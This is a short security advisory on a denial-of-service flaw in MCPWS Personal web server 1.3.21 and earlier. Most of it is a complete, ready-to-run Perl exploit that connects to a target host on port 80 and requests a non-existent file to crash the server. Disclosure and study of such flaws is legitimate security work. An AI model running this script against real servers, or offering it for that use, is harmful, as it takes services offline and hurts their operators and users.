MCPWS Personal DoS ExploitSummary
MCPWS Personal web server has been found to contain a vulnerability whereby requesting a non-existing file a remote attacker can trigger an error in the program causing it to no longer respond to legitimate requests.
Credit:
The information has been provided by Nico Spicher.
The original article can be found at: http://triplex.it-helpnet.de/unsorted%20stuff/Exploits/mcpws.pl.txt
Details
Vulnerable Systems:
* MCPWS Personal version 1.3.21 and prior
Exploit:
#!/usr/bin/perl
# MCPWS Personal - Webserver <= 1.3.21 DoS Exploit
# Vendor: http://www.mcpsoftware.de
#
# The coder used a unsecure VB-function (Open) to open requested files
# and didn't include a working error handling (On Error Goto etc).
# It's possible to exploit this vulnerability by requesting files
# that don't exist. Successful exploitation results
# in a runtime error that stops the process.
#
# Nico Spicher [http://triplex.it-helpnet.de/]
use IO::Socket;
if (@ARGV < 1)
{
system "clear";
print "[-] MCPWS Personal-Web Server <= 1.3.21 DoS Exploit\n\n";
print "[-] Usage: dos_mcpws.pl <host ip>\n";
exit(1);
}
system "clear";
$server = $ARGV[0];
system "clear";
print "[-] MCPWS Personal-Web Server <= 1.3.21 DoS Exploit\n\n";
print "[-] Server IP: ";
print $server;
print "\n[-] Connecting to IP ...\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80"); unless ($socket) { die "[-] $server is offline\n" }
print "[-] Connected\n\n";
print "[-] Creating string\n";
$string="ABCDEFGHIJKLMNOPQRSTUVWXYZ";
# This file shouldn't exist :)
print "[-] Sending string\n\n";
print $socket "GET /".$string." HTTP/1.1\r\n\r\n";
print "[>] Attack successful - Server killed\n";
close($socket);